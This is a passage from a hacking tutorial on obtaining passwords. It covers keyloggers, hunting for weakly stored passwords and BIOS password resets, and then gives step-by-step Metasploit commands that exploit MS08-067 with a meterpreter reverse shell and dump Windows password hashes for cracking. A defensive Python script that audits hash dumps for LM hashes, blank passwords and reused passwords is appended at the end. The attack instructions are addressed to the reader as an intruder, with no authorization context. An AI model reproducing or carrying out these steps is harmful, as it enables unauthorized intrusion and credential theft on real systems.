Other Ways to Uncover Passwords

 


As mentioned earlier, the easiest way to crack a password is to have physical access to the system that you are trying to hack. If you are not able to make use of cracking tools on a system, you can use the following techniques instead:

1. Keystroke logging

This is easily one of the most efficient techniques in password cracking, since it makes use of a recording device that captures keystrokes as they are typed on a keyboard. You can use keylogging software, such as KeyLogger Stealth or Spector Pro, or keylogging hardware, such as the KeyGhost.

2. Searching for weak password storage

Many applications on most computers store passwords locally, which makes them very vulnerable to hacking. Once you have physical access to a computer, you can easily find passwords by searching for storage vulnerabilities or by running text searches. If you are lucky enough, you can even find stored passwords in the application itself.

3. Weak BIOS Passwords

Many computers allow users to set power-on passwords in order to protect hardware settings that are stored in their CMOS chips. However, you can easily reset these passwords by changing a single jumper on the motherboard or by unplugging the CMOS battery from the board. You can also try your luck and search online for default user login credentials for different types of motherboards.

4. Grab passwords remotely

If physical access to the system or its location is impossible, you can still grab locally stored passwords from a system running a Windows OS from a remote location, and even grab the credentials of the system administrator account. You can do this by doing a spoofing attack first, and then exploiting the SAM file in the registry of the targeted computer by following these steps:

1. Pull up Metasploit and type the following command:

    msf > use exploit/windows/smb/ms08_067_netapi

2. Next, enter the following command:

    msf (ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

After doing so, Metasploit will show you that you need to have the target’s IP address (RHOST) and the IP address of the device that you are using (LHOST). If you have those details already, you can use the following commands to set the IP addresses for the exploit:

    msf (ms08_067_netapi) > set RHOST [target IP address] 

    msf (ms08_067_netapi) > set LHOST [your IP address]

3. Now, do the exploit by typing the following command:

    msf (ms08_067_netapi) > exploit

This will give you a terminal prompt that will allow you to access the target’s computer remotely.

4. Grab the password hash

Since most operating systems and applications tend to store passwords in hashed form, you may not be able to see the user credentials that you are after right away. However, you can get these hashes and interpret them later. To grab the hashes, use this command:

    meterpreter > hashdump

After entering this, you will see all the users on the system you are hacking, and the hashed passwords. You can then attempt to crack these hashes using tools such as Cain & Abel.
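
For defenders, the same output is audit material. The following is an added example, not part of the original post: it parses a hash dump collected during an authorized assessment and flags stored LM hashes, blank passwords, and accounts that share a password (NT hashes are unsalted, so equal hashes mean equal passwords). The pwdump-style line format `user:RID:LM:NT:::` and the function name `audit_dump` are assumptions, and the sample dump is constructed.

```python
import re
from collections import defaultdict

# Well-known constants: the LM and NT hashes of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Assumed pwdump-style layout: user:RID:LM hash:NT hash:::
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Constructed sample dump; hash values are made up except the two constants.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy_app:1002:fedcba9876543210fedcba9876543210:00112233445566778899aabbccddeeff:::
this line is not a hash entry
"""

def audit_dump(text):
    """Return (findings, skipped); findings maps account -> list of issues."""
    findings = defaultdict(list)
    by_nt = defaultdict(list)   # NT hash -> accounts using it
    skipped = []                # non-empty lines that did not parse
    for raw in text.splitlines():
        line = raw.strip()
        m = LINE_RE.match(line)
        if not m:
            if line:
                skipped.append(line)
            continue
        user, lm, nt = m.group(1), m.group(3).lower(), m.group(4).lower()
        if lm != EMPTY_LM:
            # A real LM hash is present: weak legacy storage is enabled.
            findings[user].append("LM hash stored")
        if nt == EMPTY_NT:
            # Also what a disabled account with no password looks like.
            findings[user].append("blank password")
        else:
            by_nt[nt].append(user)
    for users in by_nt.values():
        if len(users) > 1:
            for u in users:
                others = ", ".join(x for x in users if x != u)
                findings[u].append("same password as " + others)
    return dict(findings), skipped

if __name__ == "__main__":
    findings, skipped = audit_dump(SAMPLE_DUMP)
    for user, issues in findings.items():
        print(f"{user}: {'; '.join(issues)}")
    print(f"skipped {len(skipped)} unparsable line(s)")
```
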

 
